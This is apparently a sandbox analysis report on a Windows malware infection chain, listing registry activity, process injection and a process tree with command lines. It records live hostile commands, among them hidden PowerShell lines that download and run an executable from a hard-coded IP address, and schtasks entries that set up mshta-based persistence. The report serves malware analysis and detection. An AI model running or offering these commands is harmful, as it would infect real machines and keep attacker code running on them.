Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856214946406513" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\nsrxg\xjed.exe N/A
N/A N/A C:\ProgramData\nsrxg\xjed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2736 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2264 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe
PID 2264 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
PID 4600 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe C:\Windows\Explorer.EXE
PID 2264 wrote to memory of 340 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
PID 2264 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
PID 3336 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 3068 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
PID 2264 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
PID 2264 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
PID 552 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
PID 3536 wrote to memory of 4052 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe
PID 2264 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe
PID 3636 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe C:\Windows\SysWOW64\cmd.exe
PID 3636 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe C:\Windows\SysWOW64\mshta.exe
PID 2528 wrote to memory of 1680 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3824 wrote to memory of 2900 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2264 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4052 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe C:\Users\Admin\AppData\Local\Temp\temp_18344.exe
PID 3332 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe C:\Users\Admin\AppData\Local\Temp\temp_18344.exe
PID 4052 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe C:\Users\Admin\AppData\Local\Temp\temp_18364.exe
PID 3640 wrote to memory of 1780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3244 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
PID 4596 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
PID 3640 wrote to memory of 4436 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe

"C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe

"C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe"

C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe

"C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"

C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"

C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe

"C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe

"C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\ProgramData\nsrxg\xjed.exe

C:\ProgramData\nsrxg\xjed.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe

"C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe"

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe

"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"

C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe

C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe

C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe

"C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn qu8aHmaHHTR /tr "mshta C:\Users\Admin\AppData\Local\Temp\exR52xOPL.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\exR52xOPL.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn qu8aHmaHHTR /tr "mshta C:\Users\Admin\AppData\Local\Temp\exR52xOPL.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'S64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd" "

C:\Users\Admin\AppData\Local\Temp\temp_18344.exe

"C:\Users\Admin\AppData\Local\Temp\temp_18344.exe"

C:\Users\Admin\AppData\Local\Temp\temp_18344.exe

"C:\Users\Admin\AppData\Local\Temp\temp_18344.exe"

C:\Users\Admin\AppData\Local\Temp\temp_18364.exe

"C:\Users\Admin\AppData\Local\Temp\temp_18364.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe

"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"

C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe

"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE

"C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE"

C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe

"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"

C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe

"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4968 -ip 4968

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 800

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "wdknzmaySHV" /tr "mshta \"C:\Temp\ChUfktwuK.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\ChUfktwuK.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe

"C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe"

C:\Windows\TEMP\{57488497-4761-4BF1-ABE7-4CFA586E001B}\.cr\z3SJkC5.exe

"C:\Windows\TEMP\{57488497-4761-4BF1-ABE7-4CFA586E001B}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe" -burn.filehandle.attached=716 -burn.filehandle.self=652

C:\Windows\TEMP\{FA50BCA7-7100-426F-BC69-928D44773224}\.ba\WiseTurbo.exe

C:\Windows\TEMP\{FA50BCA7-7100-426F-BC69-928D44773224}\.ba\WiseTurbo.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1428 -ip 1428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 740

C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe

C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1428 -ip 1428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 768

C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe

"C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe"

C:\Users\Admin\AppData\Local\Temp\10098460101\BXxKvLN.exe

"C:\Users\Admin\AppData\Local\Temp\10098460101\BXxKvLN.exe"

C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 684 -ip 684

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 800

C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe"

C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe

"C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe"

C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe

"C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4560 -ip 4560

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 824

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe

C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe

"C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Windows\System32\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe

C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe

C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe

"C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0xd4,0x110,0x7ffbdd88cc40,0x7ffbdd88cc4c,0x7ffbdd88cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,12806233044410499264,3525411929197989756,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1908 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2140,i,12806233044410499264,3525411929197989756,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2172 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,12806233044410499264,3525411929197989756,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2256 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,12806233044410499264,3525411929197989756,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3160 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,12806233044410499264,3525411929197989756,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4484,i,12806233044410499264,3525411929197989756,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4464 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4676,i,12806233044410499264,3525411929197989756,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4476 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4432,i,12806233044410499264,3525411929197989756,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4744 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4200,i,12806233044410499264,3525411929197989756,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4444 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10098490101\JCFx2xj.exe

"C:\Users\Admin\AppData\Local\Temp\10098490101\JCFx2xj.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4652,i,12806233044410499264,3525411929197989756,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5028 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4632,i,12806233044410499264,3525411929197989756,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4796 /prefetch:8

